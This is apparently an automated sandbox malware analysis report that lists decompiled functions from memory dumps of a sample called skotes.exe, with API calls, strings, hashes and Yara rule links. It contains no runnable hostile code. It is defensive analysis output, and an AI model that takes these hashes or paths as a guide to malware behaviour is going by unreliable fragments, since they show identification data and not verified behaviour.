Opcode Fuzzy Hash: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
Instruction Fuzzy Hash: 75E01235641B24F7CB021B50EC09B8E3F58EB05753F144032FA05661619B659D40DBDF

Function 004467A9 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(005A1060,005A1060,?,7FFFFFFF,?,?,00446A65,005A1060,005A1060,?,005A1060,?,?,?,?,005A1060), ref: 0044684C
__alloca_probe_16.LIBCMT ref: 00446902
__alloca_probe_16.LIBCMT ref: 00446998
__freea.LIBCMT ref: 00446A03
__freea.LIBCMT ref: 00446A0F

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: c93d5030befdd3412ed34437d1360547b5edfd3f1e8b3b9334df1f5af1b906f8
Instruction ID: 261b0646ef3bb21783759df69fc444e01875a83395626589d87ed72ffed4e1ba
Opcode Fuzzy Hash: c93d5030befdd3412ed34437d1360547b5edfd3f1e8b3b9334df1f5af1b906f8
Instruction Fuzzy Hash: 4481C172D006459BEF20AF658881AEF7BB5DF0B354F1A405BE904B7341E739CC458BAA

Function 020ADE47 Relevance: 7.7, APIs: 5, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d23cd4dd6e2fa0143c66012945725be57b8f486d799fb0b8f6dfb3b5511e53
Instruction ID: ee063506c9aed6e5a01f4a8c8261b48086d6aff46d1ea546d83d013f756f3a5d
Opcode Fuzzy Hash: d6d23cd4dd6e2fa0143c66012945725be57b8f486d799fb0b8f6dfb3b5511e53
Instruction Fuzzy Hash: 816181B0904758AFDB21DF64CD89BD9B7B5EF04310F1042AAE909A7250EB74AA40DF56

Function 020D721B Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,020D714D), ref: 020D723D
GetFileInformationByHandle.KERNEL32(?,?), ref: 020D7297
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,020D714D,?,000000FF,00000000,00000000), ref: 020D7325
__dosmaperr.LIBCMT ref: 020D732C
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 020D7369

Part of subcall function 020D7591: __dosmaperr.LIBCMT ref: 020D75C6

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
Instruction ID: 33b96246318622447b1534a196791347a7f4e04249ef949522fab4abae7a0716
Opcode Fuzzy Hash: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
Instruction Fuzzy Hash: A6412875941744ABDB259FA5EC849AFFBF9EF88300B00492DE956D3620EB30A940DB61

Function 020ABC57 Relevance: 7.6, APIs: 5, Instructions: 130comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 020ABCBE
CoCreateInstance.COMBASE(00458F80,00000000,00000001,00458F90,?), ref: 020ABCDA
CoUninitialize.COMBASE ref: 020ABCE8
CoUninitialize.COMBASE ref: 020ABDA7
CoUninitialize.COMBASE ref: 020ABDBB

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID:
API String ID: 1968832861-0
Opcode ID: 3e1efb8a3acf5b83f8398f094812db7d9444b93ce0f50575ee480a284648f072
Instruction ID: e10d6ac3191f96fe1375c8eaf34d7b9f329bcc8f3502fbebcb9fce07f1afe5a1
Opcode Fuzzy Hash: 3e1efb8a3acf5b83f8398f094812db7d9444b93ce0f50575ee480a284648f072
Instruction Fuzzy Hash: 0C418031A00209AFDB08CFA4CC95BEE7BB5EF48719F508158F405E7691DB75E940CB94

Function 004313F5 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004313FC
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00431447
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 0043147A
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 0043152A

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: 43e26e175571f1971f65169c4e26052dd3de45c133827ef6d75fa92fc91e9e00
Instruction ID: a7bc3fe8d8b74f45c6f3d465d9c0a19c3c124717adfb71295c7f86d71a436e14
Opcode Fuzzy Hash: 43e26e175571f1971f65169c4e26052dd3de45c133827ef6d75fa92fc91e9e00
Instruction Fuzzy Hash: 6341B5B1A00615AFCB04DF69C8819DEFBB5FF48314B14922FE415A7391DB38AD01CB98

Function 020CDD97 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 020CDDCB

Part of subcall function 020C9196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 020C91B7

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 020CDE2A
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 020CDE50
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 020CDE70
Concurrency::location::_Assign.LIBCMT ref: 020CDEBD

Part of subcall function 020D1599: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 020D15DE

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
String ID:
API String ID: 1879022333-0
Opcode ID: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
Instruction ID: 1bb64277c58b50f33146bf7fde0fad99d4907ca8a937982e8ebc8b09f984d0fc
Opcode Fuzzy Hash: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
Instruction Fuzzy Hash: F141EBF0604310ABCF16BB14C885BFDBBB6AF45750F2440ADE80657381CF74A945DB91

Function 0042DB30 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042DB64

Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042DBC3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042DBE9
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0042DC09
Concurrency::location::_Assign.LIBCMT ref: 0042DC56

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerThrowTraceWork
String ID:
API String ID: 1794448563-0
Opcode ID: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
Instruction ID: de4f072aaf1dca0b17399bd929b16a9a875841cf6160958f8114d71bd43867b1
Opcode Fuzzy Hash: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
Instruction Fuzzy Hash: 84412774B04220ABCF199B25D895BAEBB75AF45310F40409FE5065B3C2CB78AD45C7D9

Function 020BEF4D Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 020BEF54
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 020BEF7E

Part of subcall function 020BF644: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 020BF661

Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 020BEFFB
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 020BF02D
__freea.LIBCMT ref: 020BF053

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
String ID:
API String ID: 2497068736-0
Opcode ID: a6c94f2b07b76275c46f7f4adf28e57aec3c88f13b0cf4508af0eed2d0fdcfcc
Instruction ID: 33155b008011778a315766ae331c69ef917839a73eac800b2f9e18da90a689d0
Opcode Fuzzy Hash: a6c94f2b07b76275c46f7f4adf28e57aec3c88f13b0cf4508af0eed2d0fdcfcc
Instruction Fuzzy Hash: F5316D71A0030A8BCB27DFA8C844AEDB7F6AF18314F64406AE805E7350DB349E02DB95

Function 004286C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 004286EE

Part of subcall function 0041EAD0: _SpinWait.LIBCONCRT ref: 0041EAE8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00428702
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00428734
List.LIBCMT ref: 004287B7
List.LIBCMT ref: 004287C6

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: b0a24117a62347580a2ad84b9a89b7294bf208186338a952b26754fdafb675af
Instruction ID: 462aa756160b9a796e7fec1675da630e13b8ae80002d108a4576a0d2cee0735b
Opcode Fuzzy Hash: b0a24117a62347580a2ad84b9a89b7294bf208186338a952b26754fdafb675af
Instruction Fuzzy Hash: C9318832A02265DFCB14EFA5E9816DEB7B1BF44308FA4406FD80167242CB79AD05CB99

Function 020C75CB Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 020C7617
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 020C7659
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 020C7675
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 020C7680
std::invalid_argument::invalid_argument.LIBCONCRT ref: 020C76A7

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID:
API String ID: 3897347962-0
Opcode ID: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
Instruction ID: c754ec5e73ddf467033a8b728400041e8b6247b49de8ad652fcd996ed1f53cf8
Opcode Fuzzy Hash: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
Instruction Fuzzy Hash: 7D2173B4A00308AFCB05EFA9C494AEDB7B9BF05355F2140ADD901A7361DB30AE05DF94

Function 020DF2A1 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 020DF2B9

Part of subcall function 020DB05C: HeapFree.KERNEL32(00000000,00000000,?,020DF334,?,00000000,?,?,?,020DF35B,?,00000007,?,?,020DF75D,?), ref: 020DB072
Part of subcall function 020DB05C: GetLastError.KERNEL32(?,?,020DF334,?,00000000,?,?,?,020DF35B,?,00000007,?,?,020DF75D,?,?), ref: 020DB084

_free.LIBCMT ref: 020DF2CB
_free.LIBCMT ref: 020DF2DD
_free.LIBCMT ref: 020DF2EF
_free.LIBCMT ref: 020DF301

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction ID: 32991a934e5a4408c45ef10f16a83e27909d23afd7832b910d7c6982b1dc5978
Opcode Fuzzy Hash: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction Fuzzy Hash: 7AF06232506701B78671EB54FAD9C6A7BDAFA007187A54805F01DD7D50DF70F880EE94

Function 0043F03A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043F052

Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D

_free.LIBCMT ref: 0043F064
_free.LIBCMT ref: 0043F076
_free.LIBCMT ref: 0043F088
_free.LIBCMT ref: 0043F09A

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction ID: afd9a687733b4b320e977570e7283cbf07406cc3be8dc42b58a2af08add3b970
Opcode Fuzzy Hash: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction Fuzzy Hash: 7AF06832904604FB8534EB5DE681C0773FBEA48312B54281BF048D7611CBB8FC84465D

Function 020DDC85 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 020DDE1F

Strings

*?, xrefs: 020DDCC8

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
Instruction ID: d4537b2c5c87f076bd3ce3fab7e6544a6b4152d84dc93c5ca874b3bedca8270e
Opcode Fuzzy Hash: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
Instruction Fuzzy Hash: 5E6118B6E01319AFCF25DFA8C8805EDFBF5EF49310B2581AAD815E7340D771AA419B90

Function 0043DA1E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043DBB8

Strings

*?, xrefs: 0043DA61

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
Instruction ID: 8444feb9c58af159b24f360d524a1af6424cb6e40e41c758a4baa9ba100f3a22
Opcode Fuzzy Hash: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
Instruction Fuzzy Hash: 1E618DB1E002199FCB14DFA9D8815EEFBF5EF4C310F25916AE845E7300E639AE418B94

Function 004426F2 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 0044275C
_free.LIBCMT ref: 0044274A

Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D

_free.LIBCMT ref: 00442916

Strings

XgE, xrefs: 00442705, 0044270B

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: XgE
API String ID: 2155170405-2984570469
Opcode ID: 408f858600a1f53604d9e13eb6c4a6de5f766e6ad14c8f26f7ae90bdf88e241d
Instruction ID: 8084bd392b0667b16f992d69d3ac30f533f8d402883a3cc5e9c46bc507ca970f
Opcode Fuzzy Hash: 408f858600a1f53604d9e13eb6c4a6de5f766e6ad14c8f26f7ae90bdf88e241d
Instruction Fuzzy Hash: 3B5117B1900215ABFB10EF65CE819AEB7B8EF44314F51026BF510E3291EBF89E418B59

Function 020D9280 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

5Y, xrefs: 020D92D1
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 020D92C3, 020D9300

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe$5Y
API String ID: 0-2402913967
Opcode ID: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
Instruction ID: 7265723e65dc043074d3592d40e67fd5facd0bf4ebaad2b9f512fc247e9ccb62
Opcode Fuzzy Hash: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
Instruction Fuzzy Hash: A6416371A01358ABCB26DF99DCC0AEEBBF9EB85314F14006AE504D7290E7B19A40EB55

Function 020D4AA7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 020D4AE6
__IsNonwritableInCurrentImage.LIBCMT ref: 020D4B9A

Strings

S9C, xrefs: 020D4B8C, 020D4B95, 020D4BA6
csm, xrefs: 020D4B84

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: S9C$csm
API String ID: 3480331319-582408667
Opcode ID: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
Instruction ID: d6e28bf367a0b879d97011273d92c93ec89f91f0f7684ed2a7b603f6a1043727
Opcode Fuzzy Hash: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
Instruction Fuzzy Hash: 3641B338A01308ABCF10DF68C884BDEBBF5AF45328F148195E914AB392D771EA45DF91

Function 020D58C2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 020D58E7
CatchIt.LIBVCRUNTIME ref: 020D59CD

Strings

RCC, xrefs: 020D5901
MOC, xrefs: 020D58F9

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
Instruction ID: 0489239567ea5e9da554af0c3cd559a6a47eb372c6f34872b1df8dd914f7e09d
Opcode Fuzzy Hash: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
Instruction Fuzzy Hash: 30415772901309AFCF16DF98CD81AEEBBB6BF08314F58809AF914A7221D3359950EF51

Function 0043565B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00435680
CatchIt.LIBVCRUNTIME ref: 00435766

Strings

RCC, xrefs: 0043569A
MOC, xrefs: 00435692

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
Instruction ID: 5e74a0003837bbbf1c0f5d1cc79d9a8e9fb2d82c4166bdd95ad30412f998441c
Opcode Fuzzy Hash: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
Instruction Fuzzy Hash: 4A418871900609EFCF15CF98DC82AEEBBB5BF4C304F18909AF90867221D339A950DB58

Function 0043E4B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0043E259: GetOEMCP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E284

_free.LIBCMT ref: 0043E528

Strings

@"F, xrefs: 0043E550
avC, xrefs: 0043E4B8

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _free
String ID: @"F$avC
API String ID: 269201875-3024483575
Opcode ID: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
Instruction ID: c2258c4a8f5ad0cbd888ce205a5b2d9973e5ee0a434949fbdbaf9cd53865a0ee
Opcode Fuzzy Hash: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
Instruction Fuzzy Hash: 5131BE71800249AFDB01DFAAD841B9F7BF5EF48318F1010AAF8109B2A2EB79DD50CB55

Function 020E2AB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 020E2B27
_free.LIBCMT ref: 020E2B7D

Part of subcall function 020E2959: _free.LIBCMT ref: 020E29B1
Part of subcall function 020E2959: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 020E29C3

Strings

XgE, xrefs: 020E2AE0

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: XgE
API String ID: 597776487-2984570469
Opcode ID: f87cbb37d26a9294995cc9def7b394ab45dcd78de0b256dadcc3d82326988738
Instruction ID: c68b98d6c290486ff58548e745e3e617cb978cb3798d936c349955374f2d7378
Opcode Fuzzy Hash: f87cbb37d26a9294995cc9def7b394ab45dcd78de0b256dadcc3d82326988738
Instruction Fuzzy Hash: 8A210432900314AFDF36AA349C44EEA77BD9B84364F110296DDA6A3090EF7049C5EAA1

Function 020C0EC3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 020C0F31
Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 020C0F3E
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 020C0F91

Strings

p[F, xrefs: 020C0F36

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_H_prolog3Lock::_ManagerManager::Reentrant
String ID: p[F
API String ID: 220083066-1832964472
Opcode ID: 6216d83329a3209df67438af02903c6e9b09d36f54debea953983a2b7a8ea068
Instruction ID: 035f22ad792c4c933ec52df0b7a704f9cc23bc12d249fc70eeb6fde609813452
Opcode Fuzzy Hash: 6216d83329a3209df67438af02903c6e9b09d36f54debea953983a2b7a8ea068
Instruction Fuzzy Hash: 6F01B5B1908701CEDB51AFB855503DDBAE2AF04750F70446EE005EB281DB744A41EB99

Function 0042A0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A102
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A126
